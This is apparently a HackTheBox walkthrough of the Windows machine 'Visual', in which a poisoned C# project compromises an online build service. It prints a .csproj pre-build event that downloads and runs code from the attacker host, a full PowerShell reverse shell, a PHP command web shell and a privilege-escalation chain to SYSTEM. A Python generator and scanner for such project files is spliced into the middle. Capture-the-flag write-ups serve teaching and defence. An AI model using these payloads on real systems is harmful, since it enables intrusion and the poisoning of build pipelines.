VISUAL MEDIUM HACKTHEBOX

Hashar Mujahid
6 min read, Feb 26, 2024


Visual is a medium-difficulty Windows machine on HackTheBox. In this post we are going to solve it.

NETWORK ENUMERATION

As always, we start with a port scan. Nmap, naabu or any similar tool will do.

──(kalirizz㉿kali)-[~/.ctfs/htb/visual-windows]
└─$ sudo nmap -sC -sV -p- --min-rate 1200 -oN nmap-tcp.txt 10.10.11.234
[sudo] password for kalirizz:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 16:57 EDT
Nmap scan report for 10.10.11.234
Host is up (0.17s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.59 seconds

Only port 80 is open, serving Apache with PHP on Windows. Let's visit it.

WEB ENUMERATION

LANDING PAGE

The site is an online build service for C# projects: you give it the URL of a repository containing a .NET 6.0 solution and it compiles the project on the server.

Let's see whether it will fetch a URL pointing at our attack machine.

On our attacker machine we got a request back, so the server does reach out to the URL we supply.

The site, however, says our URL is invalid because it does not contain an .sln file.

Let's grab any C# project from GitHub and try to serve it through a simple Python web server. I grabbed this one:

https://github.com/lunardoggo/CSharpBeginnerProjects.git

Clone it and host it with the Python web server:

python3 -m http.server 8888

Again we get the same error, even though this repository does contain an .sln file. So the check that fails must be the other one: the server most likely clones the URL as a Git repository rather than fetching files over plain HTTP. We need to host the project on a Git service. Gitea, Gogs and similar tools let us host our own repository.

Gitea can be set up with Docker:

https://docs.gitea.com/installation/install-with-docker

Just save the basic config from that page as docker-compose.yaml and start the container with docker-compose up.

Now visit `localhost:3000` and click Install, then register an account and log in.

After creating a repository, clone it locally; we will set up a .NET project inside it.

This is a great resource explaining how to attack Visual Studio for initial access:

https://www.outflank.nl/blog/2023/03/28/attacking-visual-studio-for-initial-access/

It describes one of the most common ways of hiding a backdoor: a pre-build event in the project file (the .csproj or .vcxproj, not the .sln itself), which MSBuild executes as a shell command before compiling anything. Whoever builds the project runs the command.

Let's set up a .NET project of our own. For this we need the .NET SDK, which is available as a Docker image:

[Docker Image For .NET SDK](https://hub.docker.com/_/microsoft-dotnet-sdk/)

Let's run the container, mounting our cloned Gitea repository into it:

sudo docker run -it -v ~/Documents/visual/test/:/mnt mcr.microsoft.com/dotnet/sdk:6.0 bash

We can use this tutorial to create the .NET project.

Make sure the image tag ends in `:6.0` as in the command above; in the screenshot I had left it off and had to repeat the step.

dotnet new console

creates a simple Hello World project for us. The site also requires a solution file, so we create one and add the project to it (`dotnet new sln`, then `dotnet sln add` with the project's .csproj).

Now let's push it.

Add the obj folder as well; it contains the assets produced by restore.

I had to upload the files manually because of an error.

Now let's submit the repository's URL to the Visual website.

We see the request from the Visual server arrive at Gitea.

INITIAL FOOTHOLD

The Outflank post linked above explains the common way of hiding backdoors using pre-build events. The same technique was used by North Korean actors in 2021, who sent security researchers poisoned Visual Studio projects; the pre-build event from that campaign looked like this:

<PreBuildEvent>
<Command>
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }
</Command>
</PreBuildEvent>

We replace that command with our own, which downloads and runs a PowerShell reverse shell from our attack machine. The full .csproj becomes:

<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <!-- Runs before compilation on the build server: fetch rev.ps1 from the attacker and execute it in memory -->
    <PreBuildEvent>
      powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8888/rev.ps1')
    </PreBuildEvent>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>
</Project>
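For the defensive side of this technique, here is an added example (written for this editing pass, not code from the original post or from Outflank): it generates the .csproj above with its PreBuildEvent payload and then scans project files for build-time command execution, covering the SDK-style PreBuildEvent/PostBuildEvent property, the .vcxproj PreBuildEvent/Command form quoted from the 2021 campaign, and Exec tasks in custom targets. It uses only the Python standard library; the sample project files are constructed inline, and the IP, port and rev.ps1 name are the ones from this post.

```python
"""Generate a .csproj with a PreBuildEvent payload (as in the post above) and
scan MSBuild project files for build-time command execution.

Added example, not code from the original post. Standard library only.
"""
import re
from typing import List, Optional, Tuple
from xml.etree import ElementTree as ET
from xml.sax.saxutils import escape

# MSBuild hooks that run a shell command as part of the build.
BUILD_EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent"}
# Interpreters and download helpers that rarely belong in an honest build step.
SUSPICIOUS = re.compile(
    r"\b(powershell|pwsh|cmd|rundll32|regsvr32|mshta|certutil|bitsadmin|curl|wget|iex)\b",
    re.IGNORECASE,
)


def build_csproj(prebuild_command: Optional[str] = None) -> str:
    """Return an SDK-style .csproj; with a command it matches the project above."""
    event = ""
    if prebuild_command is not None:
        event = f"    <PreBuildEvent>{escape(prebuild_command)}</PreBuildEvent>\n"
    return (
        '<Project Sdk="Microsoft.NET.Sdk">\n'
        "  <PropertyGroup>\n"
        f"{event}"
        "    <OutputType>Exe</OutputType>\n"
        "    <TargetFramework>net6.0</TargetFramework>\n"
        "    <ImplicitUsings>enable</ImplicitUsings>\n"
        "    <Nullable>enable</Nullable>\n"
        "  </PropertyGroup>\n"
        "</Project>\n"
    )


def _local(tag: str) -> str:
    """Strip the XML namespace that old-style .csproj/.vcxproj files carry."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(project_xml: str) -> List[Tuple[str, str]]:
    """Return (hook, command) for every build-time command in a project file.

    Covers the PreBuildEvent/PostBuildEvent property (SDK-style projects),
    the <PreBuildEvent><Command> form used by .vcxproj, and <Exec> tasks in
    custom targets. Static only: a command assembled from $(Property)
    expansion or pulled in from an imported .targets file is not seen here.
    """
    root = ET.fromstring(project_xml)
    found = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in BUILD_EVENT_TAGS:
            cmd_child = next((c for c in el if _local(c.tag) == "Command"), None)
            text = (cmd_child.text if cmd_child is not None else el.text) or ""
            if text.strip():
                found.append((tag, " ".join(text.split())))
        elif tag == "Exec" and el.get("Command"):
            found.append(("Exec", " ".join(el.get("Command").split())))
    return found


def flag_suspicious(project_xml: str) -> List[Tuple[str, str]]:
    """Keep only build commands that invoke an interpreter or a downloader."""
    return [(hook, cmd) for hook, cmd in find_build_commands(project_xml)
            if SUSPICIOUS.search(cmd)]


# Constructed samples: the post's payload, a clean project, the .vcxproj shape
# of the 2021 campaign quoted above (path and DLL names kept from that quote),
# and a harmless Exec task.
PAYLOAD = "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8888/rev.ps1')"
MALICIOUS_CSPROJ = build_csproj(PAYLOAD)
CLEAN_CSPROJ = build_csproj()
VCXPROJ_SAMPLE = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>powershell -executionpolicy bypass -windowstyle hidden if(Test-Path x64\\Debug\\Browse.VC.db){rundll32 x64\\Debug\\Browse.VC.db,ENGINE_get_RAND}</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""
EXEC_SAMPLE = """<Project Sdk="Microsoft.NET.Sdk">
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="echo building" />
  </Target>
</Project>
"""

if __name__ == "__main__":
    for name, xml_text in [("malicious", MALICIOUS_CSPROJ), ("clean", CLEAN_CSPROJ),
                           ("vcxproj", VCXPROJ_SAMPLE), ("exec", EXEC_SAMPLE)]:
        print(name, flag_suspicious(xml_text))
```

Run it over every *.csproj and *.vcxproj in a repository before you build anything you did not write; the interpreter list is deliberately broad, because a build step that needs PowerShell or rundll32 deserves a human look either way.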

rev.ps1 (hosted on our web server on port 8888; it connects back to our listener on port 6666):

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.8',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Once the shell lands on our netcat listener we are running as the user enox. Let's list the processes and enumerate. winPEAS cannot be transferred because antivirus is enabled, so we enumerate manually.

LATERAL ESCALATION

Let's enumerate manually.

The XAMPP Apache service is not running as our user, enox, so anything we can drop into its web root will execute as the account the service runs under. Maybe we can escalate that way.

Let's make a basic backdoor:

<?php system($_GET["cmd"]); ?>

and place it in the root of the XAMPP web server (htdocs).

We need to make sure the output file is written as ASCII: Windows PowerShell's Out-File writes UTF-16 by default, and PHP will not recognise the <?php tag in a file that starts with a BOM and has a null byte after every character.

Let's visit the shell on the website with a cmd parameter; the command runs as the web server's account.

Now let's get a reverse shell as that account, NT AUTHORITY\LOCAL SERVICE. We can use this PHP reverse shell:

https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php

Copy it into the XAMPP web root with the appropriate changes (our listener IP and port) and trigger it from the browser.

On the nc listener we get a shell as LOCAL SERVICE.

PRIVILEGE ESCALATION ROOT

Now we need to search for ways to escalate further. LOCAL SERVICE would normally hold SeImpersonatePrivilege, but a service can be started with a stripped token, and that is what we have here. Fortunately, this post explains how to recover the lost privileges:

https://itm4n.github.io/localservice-privileges/

The trick is that scheduled tasks run under a service account receive that account's full default privilege set. The post ends with a reference to a tool that automates this, FullPowers: https://github.com/itm4n/FullPowers

Download it and transfer it to the machine, then execute it.

Let's check our privileges with whoami /priv.

We can see we have all the privileges back, including SeImpersonatePrivilege.

Let's search for how to gain SYSTEM using SeImpersonatePrivilege.

Let's try GodPotato, as it is the latest of the Potato family and supports recent Windows versions; it abuses SeImpersonatePrivilege to run a command as NT AUTHORITY\SYSTEM.

Let's run it, giving it a command that establishes a reverse shell.

On the listener side:

We have SYSTEM, and with it root.

If you enjoyed this, do give me a follow.
